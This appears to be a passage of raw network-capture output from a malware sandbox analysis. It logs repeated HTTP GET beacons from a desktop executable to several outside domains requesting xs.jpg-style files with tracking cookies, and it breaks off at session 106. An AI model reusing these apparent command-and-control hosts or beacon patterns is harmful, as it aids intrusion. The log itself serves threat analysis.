                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159326|1720159259|3|18|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                  88  192.168.2.9  49801  44.221.84.105  80  7248  C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp  Bytes transferred  Direction  Data
                                  Jul 5, 2024 08:02:06.282663107 CEST  301  OUT  GET /xs.jpg?24e8c9b5=619235765 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159323|1720159259|3|17|0
                                  Jul 5, 2024 08:02:06.771897078 CEST  586  IN  HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:06 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159326|1720159259|3|18|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                  89  192.168.2.9  49802  44.221.84.105  80  7248  C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp  Bytes transferred  Direction  Data
                                  Jul 5, 2024 08:02:06.807492971 CEST  305  OUT  GET /images/xs.jpg?253cedcf=1874250093 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159323|1720159260|3|17|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:07.301615000 CEST  334  IN  HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:07 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159327|1720159260|3|18|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                  90  192.168.2.9  49803  78.46.2.155  80  7248  C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp  Bytes transferred  Direction  Data
                                  Jul 5, 2024 08:02:07.323810101 CEST  192  OUT  GET /xs.jpg?26879fc4=1522834916 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:07.997956038 CEST  403  IN  HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:07 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                  91  192.168.2.9  49804  37.230.104.89  80  7248  C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp  Bytes transferred  Direction  Data
                                  Jul 5, 2024 08:02:08.035151005 CEST  204  OUT  GET /images/xs2.jpg?27f237dd=396330763 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:08.760024071 CEST  933  IN  HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:08 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:02:08.763052940 CEST  211  OUT  GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:08.985199928 CEST  646  IN  HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:08 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:08 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  92 | 192.168.2.9 | 49805 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:09.128118992 CEST | 312 | OUT | GET /images/xs.jpg?29ccf744=-1489773296 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159326|1720159259|3|18|0
                                  Jul 5, 2024 08:02:09.966772079 CEST | 595 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:09 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159329|1720159259|3|19|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  93 | 192.168.2.9 | 49806 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:09.991240025 CEST | 302 | OUT | GET /xs.jpg?2bcaf743=1582807576 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159326|1720159259|3|18|0
                                  Jul 5, 2024 08:02:10.486390114 CEST | 586 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:10 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159330|1720159259|3|19|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  94 | 192.168.2.9 | 49807 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:10.546094894 CEST | 306 | OUT | GET /images/xs.jpg?2ca70649=-1098498342 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159327|1720159260|3|18|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:11.034728050 CEST | 334 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:10 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159330|1720159260|3|19|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  95 | 192.168.2.9 | 49808 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:11.167100906 CEST | 192 | OUT | GET /xs.jpg?2cfced02=1509546500 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:11.842875004 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:11 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  96 | 192.168.2.9 | 49809 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:11.864140034 CEST | 205 | OUT | GET /images/xs2.jpg?2e7d9d4b=1944906328 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:12.586895943 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:12 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:02:12.588943958 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:12.811820030 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:12 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:12 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  97 | 192.168.2.9 | 49810 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:12.970118999 CEST | 311 | OUT | GET /images/xs.jpg?3c09d975=2014556906 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159329|1720159259|3|19|0
                                  Jul 5, 2024 08:02:13.700014114 CEST | 595 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:13 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159333|1720159259|3|20|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  98 | 192.168.2.9 | 49811 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:13.749687910 CEST | 301 | OUT | GET /xs.jpg?3d14cd8b=633027043 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159330|1720159259|3|19|0
                                  Jul 5, 2024 08:02:14.238537073 CEST | 586 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:14 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159334|1720159259|3|20|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  99 | 192.168.2.9 | 49812 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:14.259538889 CEST | 305 | OUT | GET /images/xs.jpg?3e44093b=-116382484 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159330|1720159260|3|19|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:14.757560015 CEST | 334 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:14 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159334|1720159260|3|20|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  100 | 192.168.2.9 | 49813 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:14.792678118 CEST | 192 | OUT | GET /xs.jpg?3f86f717=1002352591 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:15.639409065 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:15 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  101 | 192.168.2.9 | 49814 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:15.707665920 CEST | 206 | OUT | GET /images/xs2.jpg?41d7fe37=-1961888438 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:16.444581032 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:16 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:02:16.475994110 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:16.705194950 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:16 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:16 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  102 | 192.168.2.9 | 49815 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:16.892206907 CEST | 311 | OUT | GET /images/xs.jpg?445d8e02=-561061362 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159333|1720159259|3|20|0
                                  Jul 5, 2024 08:02:17.630115986 CEST | 595 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:17 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159337|1720159259|3|21|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  103 | 192.168.2.9 | 49816 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:17.677812099 CEST | 301 | OUT | GET /xs.jpg?45cf8c26=389951640 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159334|1720159259|3|20|0
                                  Jul 5, 2024 08:02:18.157691956 CEST | 586 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:18 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159338|1720159259|3|21|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  104 | 192.168.2.9 | 49817 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:18.242449999 CEST | 306 | OUT | GET /images/xs.jpg?4666d3a0=-1073462208 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159334|1720159260|3|20|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:18.752218008 CEST | 334 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:18 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159338|1720159260|3|21|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  105 | 192.168.2.9 | 49818 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:18.766397953 CEST | 193 | OUT | GET /xs.jpg?47518eef=-1901912610 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:19.436955929 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:19 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  106 | 192.168.2.9 | 49819 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
